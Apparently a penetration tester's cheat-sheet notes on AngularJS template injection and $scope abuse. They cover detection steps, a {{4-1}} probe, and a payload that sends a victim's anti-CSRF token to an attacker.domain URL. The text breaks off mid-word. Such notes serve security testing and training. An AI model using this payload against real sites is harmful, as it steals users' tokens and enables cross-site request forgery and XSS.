Template Injection & Scope Hacking - Attack is limited to $scope functions and variables - Check if an application is using angular JS & Vulnerable to Template Injection or not. - Check the source code for `angular` keyword - open dev tools --> Console --> `angular.element($0).scope()` - This lists the scope - all the elements in the page - Check the soure code of functions to see what its doing - Developer tools --> Debugger --> Select app.js (whatever JS filename is) --> search for that function ; - Check for any injectable variables (Ex: some empty or dynamic content ) - Call the function - Send the below payload as input and see the connection going out - which has the victim's anti-csrf token -` {{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}` - input `{{4-1}}` --> if the output is 3 --> VULNERABLE - use this any input or search parametes. Going Beyond the Scope - XSS via Templat
Way to Divergence